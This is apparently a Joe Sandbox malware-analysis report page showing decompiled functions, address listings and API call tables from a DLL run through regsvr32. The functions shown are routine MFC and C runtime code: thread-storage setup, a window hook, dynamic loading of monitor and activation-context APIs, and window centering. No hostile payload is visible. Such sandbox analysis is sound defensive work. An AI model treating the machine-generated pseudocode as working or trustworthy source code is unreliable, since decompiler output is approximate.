0x1001c25f
0x1001c24b
0x1001c22e
0x1001c1d9
0x1001c29e
0x1001c12d
0x1001c12d
0x1001c135
0x1001c135

APIs

GetModuleHandleA.KERNEL32(KERNEL32.DLL,?,10017978,?,?,00000001,?,?,10017AE8,00000001,?,?,1002F840,0000000C,10017BA2,?), ref: 1001C121
__mtterm.LIBCMT ref: 1001C12D

Part of subcall function 1001BE05: __decode_pointer.LIBCMT ref: 1001BE16
Part of subcall function 1001BE05: TlsFree.KERNEL32(0000001E,10017A14,?,?,00000001,?,?,10017AE8,00000001,?,?,1002F840,0000000C,10017BA2,?), ref: 1001BE30

GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 1001C143
GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 1001C150
GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 1001C15D
GetProcAddress.KERNEL32(00000000,FlsFree), ref: 1001C16A
TlsAlloc.KERNEL32(?,?,00000001,?,?,10017AE8,00000001,?,?,1002F840,0000000C,10017BA2,?), ref: 1001C1BA
TlsSetValue.KERNEL32(00000000,?,?,00000001,?,?,10017AE8,00000001,?,?,1002F840,0000000C,10017BA2,?), ref: 1001C1D5
__init_pointers.LIBCMT ref: 1001C1DF
__encode_pointer.LIBCMT ref: 1001C1EA
__encode_pointer.LIBCMT ref: 1001C1FA
__encode_pointer.LIBCMT ref: 1001C20A
__encode_pointer.LIBCMT ref: 1001C21A
__decode_pointer.LIBCMT ref: 1001C23B
__calloc_crt.LIBCMT ref: 1001C254
__decode_pointer.LIBCMT ref: 1001C26E
__initptd.LIBCMT ref: 1001C27D
GetCurrentThreadId.KERNEL32 ref: 1001C284

Strings

FlsAlloc, xrefs: 1001C13D
FlsFree, xrefs: 1001C15F
KERNEL32.DLL, xrefs: 1001C11C
FlsSetValue, xrefs: 1001C152
FlsGetValue, xrefs: 1001C145

Memory Dump Source

Source File: 00000002.00000002.396523050.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.396515515.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.396553578.0000000010029000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.396575018.0000000010032000.00000008.00020000.sdmp Download File
Associated: 00000002.00000002.396612367.0000000010056000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.396624120.000000001005A000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.396629852.000000001005D000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd

Similarity

API ID: AddressProc__encode_pointer$__decode_pointer$AllocCurrentFreeHandleModuleThreadValue__calloc_crt__init_pointers__initptd__mtterm
String ID: FlsAlloc$FlsFree$FlsGetValue$FlsSetValue$KERNEL32.DLL
API String ID: 2657569430-3819984048
Opcode ID: f8eb42d05a0f46123fcd151e30e2a53c2e7fcd681058195d0d7fb9ca21756e1b
Instruction ID: b5f7097eefea174a9ed91942db92a94305995674aef8197461d434292f48097b
Opcode Fuzzy Hash: f8eb42d05a0f46123fcd151e30e2a53c2e7fcd681058195d0d7fb9ca21756e1b
Instruction Fuzzy Hash: E4319335900735AFEB11EFB59CCEA4A3BF1EB46360B144526F5049A1B1EBB5D8C0CB60

Uniqueness

Uniqueness Score: -1.00%

Function 10011389, Relevance: 33.4, APIs: 16, Strings: 3, Instructions: 179
COMMON

Download Yara Rule

C-Code - Quality: 92%

			E10011389(void* __ebx, intOrPtr __edi, void* __esi, void* __eflags) {
				intOrPtr _t54;
				void* _t55;
				signed int _t56;
				void* _t59;
				long _t60;
				signed int _t64;
				void* _t66;
				short _t72;
				signed int _t74;
				signed int _t76;
				long _t83;
				signed int _t86;
				signed short _t87;
				signed int _t88;
				int _t94;
				void* _t106;
				long* _t108;
				long _t110;
				signed int _t111;
				CHAR* _t112;
				intOrPtr _t113;
				void* _t116;
				void* _t119;
				intOrPtr _t120;

				_t119 = __eflags;
				_t105 = __edi;
				_push(0x148);
				E10017C2A(E1002866E, __ebx, __edi, __esi);
				_t110 =  *(_t116 + 0x10);
				_t94 =  *(_t116 + 0xc);
				_push(0x1000a0f5);
				 *(_t116 - 0x120) = _t110;
				_t54 = E10013D98(_t94, 0x10058f44, __edi, _t110, _t119);
				_t120 = _t54;
				_t97 = 0 | _t120 == 0x00000000;
				 *((intOrPtr*)(_t116 - 0x11c)) = _t54;
				_t121 = _t120 == 0;
				if(_t120 == 0) {
					_t54 = E1000A0DB(_t94, _t97, __edi, _t110, _t121);
				}
				if( *(_t116 + 8) == 3) {
					_t106 =  *_t110;
					_t111 =  *(_t54 + 0x14);
					_t55 = E1000D5EC(_t94, _t106, _t111, __eflags);
					__eflags = _t111;
					_t56 =  *(_t55 + 0x14) & 0x000000ff;
					 *(_t116 - 0x124) = _t56;
					if(_t111 != 0) {
						L7:
						__eflags =  *0x1005acbc;
						if( *0x1005acbc == 0) {
							L12:
							__eflags = _t111;
							if(__eflags == 0) {
								__eflags =  *0x1005a8dc;
								if( *0x1005a8dc != 0) {
									L19:
									__eflags = (GetClassLongA(_t94, 0xffffffe0) & 0x0000ffff) -  *0x1005a8dc; // 0x0
									if(__eflags != 0) {
										L23:
										_t59 = GetWindowLongA(_t94, 0xfffffffc);
										__eflags = _t59;
										 *(_t116 - 0x14) = _t59;
										if(_t59 != 0) {
											_t112 = "AfxOldWndProc423";
											_t64 = GetPropA(_t94, _t112);
											__eflags = _t64;
											if(_t64 == 0) {
												SetPropA(_t94, _t112,  *(_t116 - 0x14));
												_t66 = GetPropA(_t94, _t112);
												__eflags = _t66 -  *(_t116 - 0x14);
												if(_t66 ==  *(_t116 - 0x14)) {
													GlobalAddAtomA(_t112);
													SetWindowLongA(_t94, 0xfffffffc, E10011245);
												}
											}
										}
										L27:
										_t105 =  *((intOrPtr*)(_t116 - 0x11c));
										_t60 = CallNextHookEx( *(_t105 + 0x28), 3, _t94,  *(_t116 - 0x120));
										__eflags =  *(_t116 - 0x124);
										_t110 = _t60;
										if( *(_t116 - 0x124) != 0) {
											UnhookWindowsHookEx( *(_t105 + 0x28));
											_t50 = _t105 + 0x28;
											 *_t50 =  *(_t105 + 0x28) & 0x00000000;
											__eflags =  *_t50;
										}
										goto L30;
									}
									goto L27;
								}
								_t113 = 0x30;
								E100174D0(_t106, _t116 - 0x154, 0, _t113);
								 *((intOrPtr*)(_t116 - 0x154)) = _t113;
								_push(_t116 - 0x154);
								_push("#32768");
								_push(0);
								_t72 = E1000E5E2(_t94, _t97, _t106, "#32768", __eflags);
								__eflags = _t72;
								 *0x1005a8dc = _t72;
								if(_t72 == 0) {
									_t74 = GetClassNameA(_t94, _t116 - 0x118, 0x100);
									__eflags = _t74;
									if(_t74 == 0) {
										goto L23;
									}
									 *((char*)(_t116 - 0x19)) = 0;
									_t76 = E100199C1(_t116 - 0x118, "#32768");
									__eflags = _t76;
									if(_t76 == 0) {
										goto L27;
									}
									goto L23;
								}
								goto L19;
							}
							E1000D638(_t116 - 0x18, __eflags,  *((intOrPtr*)(_t111 + 0x1c)));
							 *(_t116 - 4) =  *(_t116 - 4) & 0x00000000;
							E1000FB9D(_t111, _t116, _t94);
							 *((intOrPtr*)( *_t111 + 0x50))();
							_t108 =  *((intOrPtr*)( *_t111 + 0xf0))();
							_t83 = SetWindowLongA(_t94, 0xfffffffc, E1001025C);
							__eflags = _t83 - E1001025C;
							if(_t83 != E1001025C) {
								 *_t108 = _t83;
							}
							 *( *((intOrPtr*)(_t116 - 0x11c)) + 0x14) =  *( *((intOrPtr*)(_t116 - 0x11c)) + 0x14) & 0x00000000;
							 *(_t116 - 4) =  *(_t116 - 4) | 0xffffffff;
							__eflags =  *(_t116 - 0x14);
							if( *(_t116 - 0x14) != 0) {
								_push( *(_t116 - 0x18));
								_push(0);
								E1000CEFC();
							}
							goto L27;
						}
						_t86 = GetClassLongA(_t94, 0xffffffe6);
						__eflags = _t86 & 0x00010000;
						if((_t86 & 0x00010000) != 0) {
							goto L27;
						}
						_t87 =  *(_t106 + 0x28);
						__eflags = _t87 - 0xffff;
						if(_t87 <= 0xffff) {
							 *(_t116 - 0x18) = 0;
							GlobalGetAtomNameA( *(_t106 + 0x28) & 0x0000ffff, _t116 - 0x18, 5);
							_t87 = _t116 - 0x18;
						}
						_t88 = E1000A7E1(_t87, "ime");
						__eflags = _t88;
						_pop(_t97);
						if(_t88 == 0) {
							goto L27;
						}
						goto L12;
					}
					__eflags =  *(_t106 + 0x20) & 0x40000000;
					if(( *(_t106 + 0x20) & 0x40000000) != 0) {
						goto L27;
					}
					__eflags = _t56;
					if(_t56 != 0) {
						goto L27;
					}
					goto L7;
				} else {
					CallNextHookEx( *(_t54 + 0x28),  *(_t116 + 8), _t94, _t110);
					L30:
					return E10017C74(_t94, _t105, _t110);
				}
			}

0x10011389
0x10011389
0x10011389
0x10011393
0x10011398
0x1001139b
0x1001139e
0x100113a8
0x100113ae
0x100113b5
0x100113b7
0x100113ba
0x100113c0
0x100113c2
0x100113c4
0x100113c4
0x100113cd
0x100113e2
0x100113e4
0x100113e7
0x100113ec
0x100113ee
0x100113f2
0x100113f8
0x1001140f
0x1001140f
0x10011416
0x10011463
0x10011463
0x10011465
0x100114cd
0x100114d5
0x10011511
0x1001151d
0x10011524
0x10011556
0x10011559
0x1001155f
0x10011561
0x10011564
0x1001156c
0x10011573
0x10011575
0x10011577
0x1001157e
0x10011586
0x10011588
0x1001158b
0x1001158e
0x1001159c
0x1001159c
0x1001158b
0x10011577
0x100115a2
0x100115a8
0x100115b4
0x100115ba
0x100115c1
0x100115c3
0x100115c8
0x100115ce
0x100115ce
0x100115ce
0x100115ce
0x00000000
0x100115d2
0x00000000
0x10011526
0x100114d9
0x100114e4
0x100114ef
0x100114f5
0x100114fb
0x100114fc
0x100114fe
0x10011506
0x10011509
0x1001150f
0x10011535
0x1001153b
0x1001153d
0x00000000
0x00000000
0x10011547
0x1001154b
0x10011550
0x10011554
0x00000000
0x00000000
0x00000000
0x10011554
0x00000000
0x1001150f
0x1001146d
0x10011472
0x10011479
0x10011482
0x10011498
0x1001149a
0x100114a0
0x100114a2
0x100114a4
0x100114a4
0x100114ac
0x100114b0
0x100114b4
0x100114b8
0x100114be
0x100114c1
0x100114c3
0x100114c3
0x00000000
0x100114b8
0x1001141b
0x10011421
0x10011426
0x00000000
0x00000000
0x1001142c
0x1001142f
0x10011434
0x10011441
0x10011445
0x1001144b
0x1001144b
0x10011454
0x10011459
0x1001145c
0x1001145d
0x00000000
0x00000000
0x00000000
0x1001145d
0x100113fa
0x10011401
0x00000000
0x00000000
0x10011407
0x10011409
0x00000000
0x00000000
0x00000000
0x100113cf
0x100113d7
0x100115d4
0x100115d9
0x100115d9

APIs

__EH_prolog3_GS.LIBCMT ref: 10011393

Part of subcall function 10013D98: __EH_prolog3.LIBCMT ref: 10013D9F

CallNextHookEx.USER32(?,?,?,?), ref: 100113D7

Part of subcall function 1000A0DB: __CxxThrowException@8.LIBCMT ref: 1000A0EF
Part of subcall function 1000A0DB: __EH_prolog3.LIBCMT ref: 1000A0FC

GetClassLongA.USER32 ref: 1001141B
GlobalGetAtomNameA.KERNEL32 ref: 10011445
SetWindowLongA.USER32(?,000000FC,Function_0001025C), ref: 1001149A
_memset.LIBCMT ref: 100114E4
GetClassLongA.USER32 ref: 10011514
GetClassNameA.USER32(?,?,00000100), ref: 10011535
GetWindowLongA.USER32 ref: 10011559
GetPropA.USER32 ref: 10011573
SetPropA.USER32(?,AfxOldWndProc423,?), ref: 1001157E
GetPropA.USER32 ref: 10011586
GlobalAddAtomA.KERNEL32 ref: 1001158E
SetWindowLongA.USER32(?,000000FC,Function_00011245), ref: 1001159C
CallNextHookEx.USER32(?,00000003,?,?), ref: 100115B4
UnhookWindowsHookEx.USER32(?), ref: 100115C8

Strings

#32768, xrefs: 100114F6, 100114FB, 10011545
AfxOldWndProc423, xrefs: 1001156C, 10011571, 1001157C, 10011584, 1001158D
ime, xrefs: 1001144E

Memory Dump Source

Source File: 00000002.00000002.396523050.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.396515515.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.396553578.0000000010029000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.396575018.0000000010032000.00000008.00020000.sdmp Download File
Associated: 00000002.00000002.396612367.0000000010056000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.396624120.000000001005A000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.396629852.000000001005D000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd

Similarity

API ID: Long$ClassHookPropWindow$AtomCallGlobalH_prolog3NameNext$Exception@8H_prolog3_ThrowUnhookWindows_memset
String ID: #32768$AfxOldWndProc423$ime
API String ID: 1191297049-4034971020
Opcode ID: a59f08c89f11fe6b3e13f01d104cbc0d9868f5cf59dfadfd77116e560bc0dc28
Instruction ID: 45731ac5847e6eda9355a9c996fe1b8867c86b30351497dbe8ef7f26860efac9
Opcode Fuzzy Hash: a59f08c89f11fe6b3e13f01d104cbc0d9868f5cf59dfadfd77116e560bc0dc28
Instruction Fuzzy Hash: 09619E31900666EFEB14DB61CC49BDE7BA9EF483A1F214254F506AB191DB34DEC1CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 1000D6C3, Relevance: 28.1, APIs: 8, Strings: 8, Instructions: 77
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 97%

			E1000D6C3() {
				void* __ebx;
				void* __esi;
				struct HINSTANCE__* _t5;
				_Unknown_base(*)()* _t6;
				_Unknown_base(*)()* _t7;
				_Unknown_base(*)()* _t8;
				_Unknown_base(*)()* _t9;
				_Unknown_base(*)()* _t10;
				_Unknown_base(*)()* _t11;
				_Unknown_base(*)()* _t12;
				struct HINSTANCE__* _t18;
				void* _t20;
				intOrPtr _t23;
				_Unknown_base(*)()* _t24;

				_t23 =  *0x1005a76c; // 0x0
				if(_t23 == 0) {
					_push(_t20);
					 *0x1005a770 = E1000D66B(0, _t20, __eflags);
					_t18 = GetModuleHandleA("USER32");
					__eflags = _t18;
					if(_t18 == 0) {
						L12:
						 *0x1005a750 = 0;
						 *0x1005a754 = 0;
						 *0x1005a758 = 0;
						 *0x1005a75c = 0;
						 *0x1005a760 = 0;
						 *0x1005a764 = 0;
						 *0x1005a768 = 0;
						_t5 = 0;
					} else {
						_t6 = GetProcAddress(_t18, "GetSystemMetrics");
						__eflags = _t6;
						 *0x1005a750 = _t6;
						if(_t6 == 0) {
							goto L12;
						} else {
							_t7 = GetProcAddress(_t18, "MonitorFromWindow");
							__eflags = _t7;
							 *0x1005a754 = _t7;
							if(_t7 == 0) {
								goto L12;
							} else {
								_t8 = GetProcAddress(_t18, "MonitorFromRect");
								__eflags = _t8;
								 *0x1005a758 = _t8;
								if(_t8 == 0) {
									goto L12;
								} else {
									_t9 = GetProcAddress(_t18, "MonitorFromPoint");
									__eflags = _t9;
									 *0x1005a75c = _t9;
									if(_t9 == 0) {
										goto L12;
									} else {
										_t10 = GetProcAddress(_t18, "EnumDisplayMonitors");
										__eflags = _t10;
										 *0x1005a764 = _t10;
										if(_t10 == 0) {
											goto L12;
										} else {
											_t11 = GetProcAddress(_t18, "GetMonitorInfoA");
											__eflags = _t11;
											 *0x1005a760 = _t11;
											if(_t11 == 0) {
												goto L12;
											} else {
												_t12 = GetProcAddress(_t18, "EnumDisplayDevicesA");
												__eflags = _t12;
												 *0x1005a768 = _t12;
												if(_t12 == 0) {
													goto L12;
												} else {
													_t5 = 1;
													__eflags = 1;
												}
											}
										}
									}
								}
							}
						}
					}
					 *0x1005a76c = 1;
					return _t5;
				} else {
					_t24 =  *0x1005a760; // 0x0
					return 0 | _t24 != 0x00000000;
				}
			}

0x1000d6c6
0x1000d6cc
0x1000d6db
0x1000d6e7
0x1000d6f2
0x1000d6f4
0x1000d6f6
0x1000d78a
0x1000d78a
0x1000d790
0x1000d796
0x1000d79c
0x1000d7a2
0x1000d7a8
0x1000d7ae
0x1000d7b4
0x1000d6fc
0x1000d708
0x1000d70a
0x1000d70c
0x1000d711
0x00000000
0x1000d713
0x1000d719
0x1000d71b
0x1000d71d
0x1000d722
0x00000000
0x1000d724
0x1000d72a
0x1000d72c
0x1000d72e
0x1000d733
0x00000000
0x1000d735
0x1000d73b
0x1000d73d
0x1000d73f
0x1000d744
0x00000000
0x1000d746
0x1000d74c
0x1000d74e
0x1000d750
0x1000d755
0x00000000
0x1000d757
0x1000d75d
0x1000d75f
0x1000d761
0x1000d766
0x00000000
0x1000d768
0x1000d76e
0x1000d770
0x1000d772
0x1000d777
0x00000000
0x1000d779
0x1000d77b
0x1000d77b
0x1000d77b
0x1000d777
0x1000d766
0x1000d755
0x1000d744
0x1000d733
0x1000d722
0x1000d711
0x1000d77e
0x1000d789
0x1000d6ce
0x1000d6d0
0x1000d6da
0x1000d6da

APIs

GetModuleHandleA.KERNEL32(USER32,00000000,00000000,770D5D80,1000D80F,?,?,?,?,?,?,?,1000F61E,00000000,00000002,00000028), ref: 1000D6EC
GetProcAddress.KERNEL32(00000000,GetSystemMetrics), ref: 1000D708
GetProcAddress.KERNEL32(00000000,MonitorFromWindow), ref: 1000D719
GetProcAddress.KERNEL32(00000000,MonitorFromRect), ref: 1000D72A
GetProcAddress.KERNEL32(00000000,MonitorFromPoint), ref: 1000D73B
GetProcAddress.KERNEL32(00000000,EnumDisplayMonitors), ref: 1000D74C
GetProcAddress.KERNEL32(00000000,GetMonitorInfoA), ref: 1000D75D
GetProcAddress.KERNEL32(00000000,EnumDisplayDevicesA), ref: 1000D76E

Strings

EnumDisplayDevicesA, xrefs: 1000D768
MonitorFromPoint, xrefs: 1000D735
GetMonitorInfoA, xrefs: 1000D757
MonitorFromRect, xrefs: 1000D724
USER32, xrefs: 1000D6E2
GetSystemMetrics, xrefs: 1000D702
EnumDisplayMonitors, xrefs: 1000D746
MonitorFromWindow, xrefs: 1000D713

Memory Dump Source

Source File: 00000002.00000002.396523050.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.396515515.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.396553578.0000000010029000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.396575018.0000000010032000.00000008.00020000.sdmp Download File
Associated: 00000002.00000002.396612367.0000000010056000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.396624120.000000001005A000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.396629852.000000001005D000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd

Similarity

API ID: AddressProc$HandleModule
String ID: EnumDisplayDevicesA$EnumDisplayMonitors$GetMonitorInfoA$GetSystemMetrics$MonitorFromPoint$MonitorFromRect$MonitorFromWindow$USER32
API String ID: 667068680-68207542
Opcode ID: ee0e5f062bbe94e4a9e7c06d78520802f13055058268d31d10b74b4948bb3027
Instruction ID: 93615fb53cb164fe7f3d347b700eade87a81924dee4312457033af375ccc55a3
Opcode Fuzzy Hash: ee0e5f062bbe94e4a9e7c06d78520802f13055058268d31d10b74b4948bb3027
Instruction Fuzzy Hash: 7921E3B19097699BE701EF369DC856DBAF5F34F281391453FE109D2528EB3884C6EE20

Uniqueness

Uniqueness Score: -1.00%

Function 1000F530, Relevance: 24.7, APIs: 13, Strings: 1, Instructions: 176
windowCOMMON

Download Yara Rule

C-Code - Quality: 89%

			E1000F530(void* __ebx, intOrPtr __ecx, void* __edx, intOrPtr _a4) {
				signed int _v8;
				intOrPtr _v12;
				struct tagRECT _v28;
				struct tagRECT _v44;
				struct tagRECT _v60;
				struct tagRECT _v80;
				char _v100;
				void* __edi;
				intOrPtr _t58;
				struct HWND__* _t59;
				intOrPtr _t94;
				signed int _t103;
				struct HWND__* _t104;
				void* _t105;
				struct HWND__* _t107;
				long _t108;
				long _t116;
				void* _t119;
				struct HWND__* _t121;
				void* _t123;
				intOrPtr _t125;
				intOrPtr _t129;

				_t119 = __edx;
				_t105 = __ebx;
				_t125 = __ecx;
				_v12 = __ecx;
				_v8 = E10012862(__ecx);
				_t58 = _a4;
				if(_t58 == 0) {
					if((_v8 & 0x40000000) == 0) {
						_t59 = GetWindow( *(__ecx + 0x20), 4);
					} else {
						_t59 = GetParent( *(__ecx + 0x20));
					}
					_t121 = _t59;
					if(_t121 != 0) {
						_t104 = SendMessageA(_t121, 0x36b, 0, 0);
						if(_t104 != 0) {
							_t121 = _t104;
						}
					}
				} else {
					_t4 = _t58 + 0x20; // 0xc033d88b
					_t121 =  *_t4;
				}
				_push(_t105);
				GetWindowRect( *(_t125 + 0x20),  &_v60);
				if((_v8 & 0x40000000) != 0) {
					_t107 = GetParent( *(_t125 + 0x20));
					GetClientRect(_t107,  &_v28);
					GetClientRect(_t121,  &_v44);
					MapWindowPoints(_t121, _t107,  &_v44, 2);
				} else {
					if(_t121 != 0) {
						_t103 = GetWindowLongA(_t121, 0xfffffff0);
						if((_t103 & 0x10000000) == 0 || (_t103 & 0x20000000) != 0) {
							_t121 = 0;
						}
					}
					_v100 = 0x28;
					if(_t121 != 0) {
						GetWindowRect(_t121,  &_v44);
						E1000D86F(_t121, E1000D804(_t121, 2),  &_v100);
						CopyRect( &_v28,  &_v80);
					} else {
						_t94 = E1000A7CE();
						if(_t94 != 0) {
							_t94 =  *((intOrPtr*)(_t94 + 0x20));
						}
						E1000D86F(_t121, E1000D804(_t94, 1),  &_v100);
						CopyRect( &_v44,  &_v80);
						CopyRect( &_v28,  &_v80);
					}
				}
				_t108 = _v60.left;
				asm("cdq");
				_t123 = _v60.right - _t108;
				asm("cdq");
				_t120 = _v44.bottom;
				_t116 = (_v44.left + _v44.right - _t119 >> 1) - (_t123 - _t119 >> 1);
				_a4 = _v60.bottom - _v60.top;
				asm("cdq");
				asm("cdq");
				_t129 = (_v44.top + _v44.bottom - _v44.bottom >> 1) - (_a4 - _t120 >> 1);
				if(_t116 >= _v28.left) {
					if(_t123 + _t116 > _v28.right) {
						_t116 = _t108 - _v60.right + _v28.right;
					}
				} else {
					_t116 = _v28.left;
				}
				if(_t129 >= _v28.top) {
					if(_a4 + _t129 > _v28.bottom) {
						_t129 = _v60.top - _v60.bottom + _v28.bottom;
					}
				} else {
					_t129 = _v28.top;
				}
				return E1001297A(_v12, 0, _t116, _t129, 0xffffffff, 0xffffffff, 0x15);
			}

0x1000f530
0x1000f530
0x1000f537
0x1000f53a
0x1000f542
0x1000f545
0x1000f54a
0x1000f558
0x1000f56a
0x1000f55a
0x1000f55d
0x1000f55d
0x1000f570
0x1000f574
0x1000f580
0x1000f588
0x1000f58a
0x1000f58a
0x1000f588
0x1000f54c
0x1000f54c
0x1000f54c
0x1000f54c
0x1000f58c
0x1000f59a
0x1000f5a3
0x1000f643
0x1000f64a
0x1000f651
0x1000f65b
0x1000f5a9
0x1000f5ab
0x1000f5b0
0x1000f5bb
0x1000f5c4
0x1000f5c4
0x1000f5bb
0x1000f5c8
0x1000f5cf
0x1000f610
0x1000f61f
0x1000f62c
0x1000f5d1
0x1000f5d1
0x1000f5d8
0x1000f5da
0x1000f5da
0x1000f5ea
0x1000f5fd
0x1000f607
0x1000f607
0x1000f5cf
0x1000f66a
0x1000f66f
0x1000f674
0x1000f678
0x1000f67b
0x1000f682
0x1000f68a
0x1000f692
0x1000f69a
0x1000f6a1
0x1000f6a6
0x1000f6b2
0x1000f6ba
0x1000f6ba
0x1000f6a8
0x1000f6a8
0x1000f6a8
0x1000f6c0
0x1000f6cf
0x1000f6d7
0x1000f6d7
0x1000f6c2
0x1000f6c2
0x1000f6c2
0x1000f6ef

APIs

Part of subcall function 10012862: GetWindowLongA.USER32 ref: 1001286D

GetParent.USER32(?), ref: 1000F55D
SendMessageA.USER32(00000000,0000036B,00000000,00000000), ref: 1000F580
GetWindowRect.USER32 ref: 1000F59A
GetWindowLongA.USER32 ref: 1000F5B0
CopyRect.USER32 ref: 1000F5FD
CopyRect.USER32 ref: 1000F607
GetWindowRect.USER32 ref: 1000F610
CopyRect.USER32 ref: 1000F62C

Strings

(, xrefs: 1000F5C8

Memory Dump Source

Source File: 00000002.00000002.396523050.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.396515515.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.396553578.0000000010029000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.396575018.0000000010032000.00000008.00020000.sdmp Download File
Associated: 00000002.00000002.396612367.0000000010056000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.396624120.000000001005A000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.396629852.000000001005D000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd

Similarity

API ID: Rect$Window$Copy$Long$MessageParentSend
String ID: (
API String ID: 808654186-3887548279
Opcode ID: 7a74a446788f1e642fa1c3aef1600eb5c5d71207166799e974e91dfaab450861
Instruction ID: 3f3129d87232bc90929dbfd76231b55f7e5f3d8dd267dcccc126c4261812b80e
Opcode Fuzzy Hash: 7a74a446788f1e642fa1c3aef1600eb5c5d71207166799e974e91dfaab450861
Instruction Fuzzy Hash: 84517072900619AFEB00DFA8CC85EEEBBB9EF48290F154119FA05F3594DB30ED419B60

Uniqueness

Uniqueness Score: -1.00%

Function 1000A1F9, Relevance: 17.6, APIs: 5, Strings: 5, Instructions: 56
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E1000A1F9(intOrPtr* __ecx, void* __esi, intOrPtr _a4) {
				void* __ebx;
				void* __edi;
				void* __ebp;
				_Unknown_base(*)()* _t9;
				struct HINSTANCE__* _t15;
				void* _t16;
				intOrPtr* _t18;
				char _t19;
				intOrPtr _t21;
				_Unknown_base(*)()* _t22;
				_Unknown_base(*)()* _t23;

				_t16 = __esi;
				_t12 = __ecx;
				_t18 = __ecx;
				 *__ecx = _a4;
				_a4 = 0;
				_t19 =  *0x10058f2c; // 0x0
				if(_t19 == 0) {
					_t15 = GetModuleHandleA("KERNEL32");
					_t20 = _t15;
					if(_t15 == 0) {
						L2:
						E1000A0DB(0, _t12, _t15, _t16, _t20);
					}
					 *0x10058f1c = GetProcAddress(_t15, "CreateActCtxA");
					 *0x10058f20 = GetProcAddress(_t15, "ReleaseActCtx");
					 *0x10058f24 = GetProcAddress(_t15, "ActivateActCtx");
					_t9 = GetProcAddress(_t15, "DeactivateActCtx");
					_t21 =  *0x10058f1c; // 0x0
					 *0x10058f28 = _t9;
					_t16 = _t16;
					if(_t21 == 0) {
						__eflags =  *0x10058f20; // 0x0
						if(__eflags != 0) {
							goto L2;
						} else {
							__eflags =  *0x10058f24; // 0x0
							if(__eflags != 0) {
								goto L2;
							} else {
								__eflags = _t9;
								if(__eflags != 0) {
									goto L2;
								}
							}
						}
					} else {
						_t22 =  *0x10058f20; // 0x0
						if(_t22 == 0) {
							goto L2;
						} else {
							_t23 =  *0x10058f24; // 0x0
							if(_t23 == 0) {
								goto L2;
							} else {
								_t20 = _t9;
								if(_t9 == 0) {
									goto L2;
								}
							}
						}
					}
					 *0x10058f2c = 1;
				}
				return _t18;
			}

0x1000a1f9
0x1000a1f9
0x1000a1ff
0x1000a203
0x1000a206
0x1000a209
0x1000a210
0x1000a221
0x1000a223
0x1000a225
0x1000a227
0x1000a227
0x1000a227
0x1000a241
0x1000a24e
0x1000a25b
0x1000a260
0x1000a262
0x1000a268
0x1000a26d
0x1000a26e
0x1000a286
0x1000a28c
0x00000000
0x1000a28e
0x1000a28e
0x1000a294
0x00000000
0x1000a296
0x1000a296
0x1000a298
0x00000000
0x00000000
0x1000a298
0x1000a294
0x1000a270
0x1000a270
0x1000a276
0x00000000
0x1000a278
0x1000a278
0x1000a27e
0x00000000
0x1000a280
0x1000a280
0x1000a282
0x00000000
0x1000a284
0x1000a282
0x1000a27e
0x1000a276
0x1000a29a
0x1000a29a
0x1000a2a6

APIs

GetModuleHandleA.KERNEL32(KERNEL32,00000000,?,00000020,1000ACB1,000000FF), ref: 1000A21B
GetProcAddress.KERNEL32(00000000,CreateActCtxA), ref: 1000A239
GetProcAddress.KERNEL32(00000000,ReleaseActCtx), ref: 1000A246
GetProcAddress.KERNEL32(00000000,ActivateActCtx), ref: 1000A253
GetProcAddress.KERNEL32(00000000,DeactivateActCtx), ref: 1000A260

Strings

ActivateActCtx, xrefs: 1000A248
DeactivateActCtx, xrefs: 1000A255
CreateActCtxA, xrefs: 1000A233
ReleaseActCtx, xrefs: 1000A23B
KERNEL32, xrefs: 1000A216

Memory Dump Source

Source File: 00000002.00000002.396523050.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.396515515.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.396553578.0000000010029000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.396575018.0000000010032000.00000008.00020000.sdmp Download File
Associated: 00000002.00000002.396612367.0000000010056000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.396624120.000000001005A000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.396629852.000000001005D000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd

Similarity

API ID: AddressProc$HandleModule
String ID: ActivateActCtx$CreateActCtxA$DeactivateActCtx$KERNEL32$ReleaseActCtx
API String ID: 667068680-3617302793
Opcode ID: 8958f846425cfb9847c1ef030b437731261e480fa3a980f3a7b160ae38ca1aab
